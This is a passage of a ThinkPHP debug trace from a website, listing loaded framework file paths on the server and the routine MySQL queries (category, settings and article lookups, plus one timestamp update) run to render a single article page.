  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000527s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000663s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.017494s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.003325s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000689s ]
  6. SELECT * FROM `set` [ RunTime:0.000238s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000683s ]
  8. SELECT * FROM `article` WHERE `id` = 493592 LIMIT 1 [ RunTime:0.000790s ]
  9. UPDATE `article` SET `lasttime` = 1783073469 WHERE `id` = 493592 [ RunTime:0.011198s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 67 LIMIT 1 [ RunTime:0.000302s ]
  11. SELECT * FROM `article` WHERE `id` < 493592 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000915s ]
  12. SELECT * FROM `article` WHERE `id` > 493592 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000479s ]
  13. SELECT * FROM `article` WHERE `id` < 493592 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.003501s ]
  14. SELECT * FROM `article` WHERE `id` < 493592 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.002070s ]
  15. SELECT * FROM `article` WHERE `id` < 493592 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.002988s ]
0.118357s